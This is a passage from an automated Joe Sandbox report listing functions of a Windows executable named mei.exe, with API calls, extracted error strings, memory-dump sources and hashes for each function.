                                                                                                                                                                      • Instruction Fuzzy Hash: F491DCB3E48B4681FB618E25D4103BD37A1AB40B68F446136DA9EC73D5DE3CEE05A720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F0458 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                      • Opcode ID: 0b870b3a3d649be6e4f6c0b612b8e25b541f8dcea366d64dcbc5d49be93c66d1
                                                                                                                                                                      • Instruction ID: 6b0916b6aa5c1a38a5e61c63881268ede55f59a7f04d2db2fc531e399689f6b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b870b3a3d649be6e4f6c0b612b8e25b541f8dcea366d64dcbc5d49be93c66d1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D81AE72E0C20285FB648F2DC2542B82BE2EB51B58FA58035DA6DD7795DF3DE901BB01
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DEF88 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: 59ac2c9e4a5220c2fa7bc6dcfd9cbcaf6d037ac2a111382551f8a72c0d17a11c
                                                                                                                                                                      • Instruction ID: 2a41f9f020d58f37060e4f1e7d79d6515e363ed09f788a0eead354ac23ece127
                                                                                                                                                                      • Opcode Fuzzy Hash: 59ac2c9e4a5220c2fa7bc6dcfd9cbcaf6d037ac2a111382551f8a72c0d17a11c
                                                                                                                                                                      • Instruction Fuzzy Hash: 28615873E08B458AF7208F65E4803AD7BA4FB49B98F144225EE4D57B98DF38E156D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DF2E4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 1180bfda959e97f02d570b5dde1e1b48c1dd59e29b574f701b62c64f34128176
                                                                                                                                                                      • Instruction ID: 05fc6b2a0cdc1dd460713112e6a71bb6b481ea0d1ce8b718c2adb78bc67ac22f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1180bfda959e97f02d570b5dde1e1b48c1dd59e29b574f701b62c64f34128176
                                                                                                                                                                      • Instruction Fuzzy Hash: B2519B32D0828286FB648F2595942787BA8FF44B98F144135DA9DD7BD5CF3CE462E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D2830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-2410924014
                                                                                                                                                                      • Opcode ID: 38c4b4e2a01e1bb9762b054cdf89db1cb30aa17529e4998d71cfbd5aabc681da
                                                                                                                                                                      • Instruction ID: d9cc0084dd855f677b81ebab6651fbf7a8a76150cc0075da587f2d3a88fc0f50
                                                                                                                                                                      • Opcode Fuzzy Hash: 38c4b4e2a01e1bb9762b054cdf89db1cb30aa17529e4998d71cfbd5aabc681da
                                                                                                                                                                      • Instruction Fuzzy Hash: A33123B2A2868291FB30EB10E4516EA63A4FF847C4F805136E68D97B99DF3CD705DB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D3E70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D3EA1
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                      • API String ID: 2581892565-1977442011
                                                                                                                                                                      • Opcode ID: 884470a16d803e703ac994cbfd20ed5309a2f1ef6ebe04e4886aa8d96d26a44e
                                                                                                                                                                      • Instruction ID: 8306b74de74d5bc713d0f675630365355400bfa992cf039f3a5ddf0bc3f5d9f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 884470a16d803e703ac994cbfd20ed5309a2f1ef6ebe04e4886aa8d96d26a44e
                                                                                                                                                                      • Instruction Fuzzy Hash: A8018BA2F1D64380FB60E720E8157B95295AF5D7C4F800436E84EC7396EE3DE64AE700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313ECA10 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                      • Opcode ID: 363851c63275ea675678f574e082c43441c16a767f927bd16495698a93953cb3
                                                                                                                                                                      • Instruction ID: 576dc776bcc55c9dd7670ca97864f30958ba2ba00290e1cbf92261b5e92f54c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 363851c63275ea675678f574e082c43441c16a767f927bd16495698a93953cb3
                                                                                                                                                                      • Instruction Fuzzy Hash: 48D1CE73F18B8189FB11CF69D4402AC3BA1FB84B98B045236CE5D97B9ADE38D916D350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E5664 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                      • Opcode ID: 2554d0f3aaa8c7c8845c2ac82e2dc95f9a74a923a0d9a28b3c9ce595bb4fe81d
                                                                                                                                                                      • Instruction ID: 397ee911750b5e6b624a3c58c21f32038454de464488f75cacac492d6f1f7bb2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2554d0f3aaa8c7c8845c2ac82e2dc95f9a74a923a0d9a28b3c9ce595bb4fe81d
                                                                                                                                                                      • Instruction Fuzzy Hash: 55515C6BE087418AFB10DFB1D4403BD27A1AF48B58F149535DE099B789DF38DA519720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D22D0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                      • Opcode ID: f1ca6ea12a98ff4eb48201161cb22c319a647daafa808267472dc2b63104d68a
                                                                                                                                                                      • Instruction ID: 5a73ecc290f5d28c93cd01d54728652507f669f6ce43e09bf67e246eaf9aaa7d
                                                                                                                                                                      • Opcode Fuzzy Hash: f1ca6ea12a98ff4eb48201161cb22c319a647daafa808267472dc2b63104d68a
                                                                                                                                                                      • Instruction Fuzzy Hash: 6411D671F1C18282FB549B6AF5442BD1292EF8DBC0F888031EE5987B9ECE3CD4D5A600
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F613C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: ?
                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                      • Opcode ID: 69fb90209f1032b4e69d8b0751149bc2eb1170519beff1835249cde7d1444824
                                                                                                                                                                      • Instruction ID: 6c29415a7b148c05102a130394b75ee49ecb973192186b1aac0c8fd0bb2f3788
                                                                                                                                                                      • Opcode Fuzzy Hash: 69fb90209f1032b4e69d8b0751149bc2eb1170519beff1835249cde7d1444824
                                                                                                                                                                      • Instruction Fuzzy Hash: 38411562E1878252FB649B25E80137A6BE0EF81BA4F144235EF6C87BD6DF3CD4419700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E9454 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313E9486
                                                                                                                                                                        • Part of subcall function 00007FF6313EADBC: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
                                                                                                                                                                        • Part of subcall function 00007FF6313EADBC: GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6313DBF95), ref: 00007FF6313E94A4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: C:\Users\user\Desktop\mei.exe
                                                                                                                                                                      • API String ID: 3976345311-163936489
                                                                                                                                                                      • Opcode ID: 9fa3685a1bd0b725fed1ce90871433d4c2739ea64b9843da9ecd8f260f310b5b
                                                                                                                                                                      • Instruction ID: ff2ef332488afe0cd5c034b34663221b332df6513d13aefe5f1f3791a3cb1353
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fa3685a1bd0b725fed1ce90871433d4c2739ea64b9843da9ecd8f260f310b5b
                                                                                                                                                                      • Instruction Fuzzy Hash: F8417C33E08B02CAFB54DF26D4500BD37A4EF84784B556035E98E87B86DE3DE9919710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313ED0A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: cd97ba882cf61520808db9468f7ebffeb4fea8ab3a293baa5276c2e7e13191e0
                                                                                                                                                                      • Instruction ID: 794745bb3784181abf82f4a349291ba4825537a679526fbdbee34fd4c079b680
                                                                                                                                                                      • Opcode Fuzzy Hash: cd97ba882cf61520808db9468f7ebffeb4fea8ab3a293baa5276c2e7e13191e0
                                                                                                                                                                      • Instruction Fuzzy Hash: E041BF63B18B8182EB608F25E8443BA67A1FB98794F804035EE4DC7798DF3CD541DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EF7C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                      • Opcode ID: d06083b29aaf7a7bb8f1cb43b97a3262d6381e0dc3a658b95be9ed3abb95a8cd
                                                                                                                                                                      • Instruction ID: 639cacccc025e47ece6430f3f338159efbd0f9ecf17ea816a010a57a12235f89
                                                                                                                                                                      • Opcode Fuzzy Hash: d06083b29aaf7a7bb8f1cb43b97a3262d6381e0dc3a658b95be9ed3abb95a8cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 7421CC73E0879282FB249B11D44427E77A5FB88B84F858035DA8D83784DFBCEE459760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D2AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-4025702859
                                                                                                                                                                      • Opcode ID: 38ddc9f8031b6d28749fff208fae5418e08c87bb0529f444b5e3f442e23a2439
                                                                                                                                                                      • Instruction ID: 94fdbb4a1ec209d58c205430c74c87744440bf4cd4ba205ee7943ce2d55d70fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 38ddc9f8031b6d28749fff208fae5418e08c87bb0529f444b5e3f442e23a2439
                                                                                                                                                                      • Instruction Fuzzy Hash: 332153B2A2868291FB20DB11E4516EA73A4FF84784F805136E68D87B69DF3CD215DB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D2BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Error detected
                                                                                                                                                                      • API String ID: 1878133881-3513342764
                                                                                                                                                                      • Opcode ID: 17a36bc69ed8b46b5b0e6c335e0ee94e3cbae77caabcd9ab1d2acf0b64b24cb0
                                                                                                                                                                      • Instruction ID: 03af2a4ffb57e25615023aca6ee6b2a576552a00f17035bf759cd1a3ffa6dce1
                                                                                                                                                                      • Opcode Fuzzy Hash: 17a36bc69ed8b46b5b0e6c335e0ee94e3cbae77caabcd9ab1d2acf0b64b24cb0
